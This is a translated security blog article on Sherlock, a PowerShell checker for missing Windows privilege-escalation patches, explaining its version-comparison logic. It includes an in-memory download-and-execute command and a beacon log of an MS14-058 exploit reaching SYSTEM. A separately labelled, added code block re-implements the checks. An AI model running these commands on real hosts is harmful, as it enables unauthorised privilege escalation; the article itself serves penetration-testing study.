Analysis and Use of Sherlock, a Handy Privilege-Escalation Checker
*Original author: zusheng. This article is part of the FreeBuf original-content reward programme; reproduction without permission is prohibited.
0x01 Introduction to Sherlock
Sherlock is a PowerShell script for finding local privilege-escalation vulnerabilities on Windows.
It currently covers the following vulnerabilities:
- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle
0x02 Basic Usage
Load the script locally:
Import-Module Sherlock.ps1
Load the script remotely:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Run the checks:
PS C:\Users\Administrator> Find-AllVulns

Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
A VulnStatus of Appears Vulnerable means the vulnerability is present on the host.
Verification:
PS C:\Users\Administrator> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...
[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105
[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
The elevation succeeded. Note that Sherlock only verifies whether a vulnerability is present; it does not exploit it for you.
0x03 Hidden Tricks
Besides the basic functionality above, the script contains a few small features the author does not document.
Getting a file's version
Sherlock can also report a file's version number: simply run the Get-FileVersionInfo command.
Demo: (screenshot in the original, not reproduced here)
Getting the CPU architecture
Run the Get-Architecture command to find out whether the CPU architecture is 32-bit or 64-bit.
Demo: (screenshot in the original, not reproduced here)
0x04 How Sherlock Verifies a Vulnerability
Beyond the vulnerabilities the author has already included, we can add checks for vulnerabilities we are interested in ourselves. Before adding one, let us analyse how Sherlock's verification works.
In Sherlock, every vulnerability check is a function of the following form:

function Find-MS16032 {
}

The function first calls Get-Architecture to determine the system architecture and decides whether the vulnerability applies to it; only if it does is the next check performed:

if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )

Next, Get-FileVersionInfo retrieves the version information of the file affected by the vulnerability; what matters are the last two numeric fields, the build and the revision.
After that it is simple: a switch on the build plus an if on the revision compares the file version against the patched level:

# $Build and $Revision come from the Get-FileVersionInfo result; they must be
# numeric for -ge/-le to compare as numbers rather than as strings
switch ( $Build ) {
    7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
    7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
    9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
    9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
    10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
    10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
    default { $VulnStatus = "Not Vulnerable" }
}
Adding our own vulnerability is then easy: add the vulnerability's information in function New-ExploitTable.
As a test, first create a function Find-MS16135:

function Find-MS16135 {
    $MSBulletin = "MS16-135"
    # hard-coded for this test; a real module would derive $VulnStatus from the file version
    $VulnStatus = "Appears Vulnerable"
    Set-ExploitTable $MSBulletin $VulnStatus
}

Then add Find-MS16135 to function Find-AllVulns, and that is it.
Test it: (screenshot in the original, not reproduced here)
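To make the check pattern of this section concrete, here is an added example (my own code, not Sherlock's and not part of the original article) that re-implements the pipeline end to end: a file-version reader equivalent to Get-FileVersionInfo, an integer build/revision parser, a generic form of the switch shown above, the architecture gate, a row table standing in for New-ExploitTable and Set-ExploitTable, and a hypothetical Find-MSPLACEHOLDER module registered in a Find-AllChecks runner. The bulletin id MS-PLACEHOLDER, the file name example.dll, the threshold revisions and the advisory URL are constructed placeholders, not real patch levels; a real module takes them from the vendor advisory. The comparison is exercised at the end on constructed version strings, so the logic can be checked without the target file being present.

```powershell
# Added example (not Sherlock's code): a self-contained re-implementation of the
# Sherlock check pattern, so the build/revision comparison can be exercised
# offline. All bulletin ids, file names, thresholds and URLs are CONSTRUCTED
# placeholders for illustration, not real patch levels.

# Counterpart of Sherlock's Get-FileVersionInfo: "major.minor.build.revision",
# or $null when the file does not exist.
function Get-BinaryVersion {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $v = (Get-Item -LiteralPath $Path).VersionInfo
    return ('{0}.{1}.{2}.{3}' -f $v.FileMajorPart, $v.FileMinorPart, $v.FileBuildPart, $v.FilePrivatePart)
}

# Splits a version string into integer build and revision. The [int] casts matter:
# PowerShell picks the comparison type from the left operand, so with strings
# '9999' -le '23348' is $false (lexical), while 9999 -le 23348 is $true.
function ConvertTo-BuildRevision {
    param([Parameter(Mandatory)][string]$VersionString)
    $parts = $VersionString.Split(' ')[0].Split('.')   # drop any "(branch.date)" suffix
    if ($parts.Length -lt 4) { throw "Unexpected version format: $VersionString" }
    return [pscustomobject]@{ Build = [int]$parts[2]; Revision = [int]$parts[3] }
}

# General form of the switch in the article: $MaxVulnerableRevision maps an OS
# build to the highest revision that still lacks the fix. Builds absent from the
# map fall through to "Not Vulnerable", like the original default branch.
function Test-RevisionThreshold {
    param(
        [Parameter(Mandatory)][string]$VersionString,
        [Parameter(Mandatory)][hashtable]$MaxVulnerableRevision
    )
    $br = ConvertTo-BuildRevision -VersionString $VersionString
    if (-not $MaxVulnerableRevision.ContainsKey($br.Build)) { return 'Not Vulnerable' }
    if ($br.Revision -le $MaxVulnerableRevision[$br.Build]) { return 'Appears Vulnerable' }
    return 'Not Vulnerable'
}

# Same gate as Sherlock: a 64-bit process on AMD64, or a 32-bit OS.
function Test-SupportedArchitecture {
    $os = (Get-CimInstance -ClassName Win32_OperatingSystem).OSArchitecture   # "64-bit" or "32-bit"
    return ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64' -or $os -eq '32-bit')
}

# Stand-in for New-ExploitTable / Set-ExploitTable: one row per check, updated in place.
$script:ExploitTable = New-Object System.Collections.ArrayList
function Add-ExploitRow {
    param([string]$Title, [string]$MSBulletin, [string]$CVEID, [string]$Link)
    [void]$script:ExploitTable.Add([pscustomobject]@{
        Title = $Title; MSBulletin = $MSBulletin; CVEID = $CVEID; Link = $Link; VulnStatus = 'Not checked'
    })
}
function Set-ExploitStatus {
    param([string]$MSBulletin, [string]$VulnStatus)
    $script:ExploitTable | Where-Object { $_.MSBulletin -eq $MSBulletin } | ForEach-Object { $_.VulnStatus = $VulnStatus }
}

# HYPOTHETICAL check module in the Find-MSxxxx shape. Bulletin id, file and
# thresholds are placeholders; a real module takes them from the vendor advisory.
function Find-MSPLACEHOLDER {
    $MSBulletin = 'MS-PLACEHOLDER'
    if (-not (Test-SupportedArchitecture)) {
        Set-ExploitStatus -MSBulletin $MSBulletin -VulnStatus 'Not supported on this architecture'
        return
    }
    $version = Get-BinaryVersion -Path "$env:windir\System32\example.dll"   # placeholder file name
    if (-not $version) { Set-ExploitStatus -MSBulletin $MSBulletin -VulnStatus 'File not found'; return }
    $status = Test-RevisionThreshold -VersionString $version -MaxVulnerableRevision @{
        7601 = 23000   # constructed: treat Windows 7 SP1 revisions <= 23000 as unpatched
        9600 = 18000   # constructed: same idea for Windows 8.1
    }
    Set-ExploitStatus -MSBulletin $MSBulletin -VulnStatus $status
}

# Stand-in for Find-AllVulns: register rows, run every module, return the table.
function Find-AllChecks {
    $script:ExploitTable.Clear()
    Add-ExploitRow -Title 'Placeholder check' -MSBulletin 'MS-PLACEHOLDER' -CVEID 'CVE-PLACEHOLDER' -Link 'https://example.invalid/advisory'
    Find-MSPLACEHOLDER
    return $script:ExploitTable
}

# Exercise the comparison on constructed version strings (no target file needed).
$demo = @{ 7601 = 23000; 9600 = 18000 }
foreach ($vs in '6.1.7601.22999', '6.1.7601.23001', '10.0.10240.16384 (th1.150729-1800)') {
    '{0,-40} {1}' -f $vs, (Test-RevisionThreshold -VersionString $vs -MaxVulnerableRevision $demo)
}
# Full run, reporting only rows that still look unpatched.
Find-AllChecks | Where-Object { $_.VulnStatus -eq 'Appears Vulnerable' } | Format-Table Title, MSBulletin, VulnStatus
```

The one point the example makes explicit that the original switch leaves implicit is the type of $Build and $Revision: PowerShell chooses the comparison type from the left operand, so if the revision is still a string the -le test is lexical and a revision such as 9999 is wrongly reported as patched against a 23348 threshold. Casting both fields to [int] once, in the parser, removes that failure mode for every module that uses the helper.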
0x05 Summary
That is the overall idea of the framework. What remains is for readers to find the vulnerable file versions; I currently have no good method for locating vulnerable file versions quickly, so if anyone has a good approach, please share it.
Project URL: https://github.com/rasta-mouse/Sherlock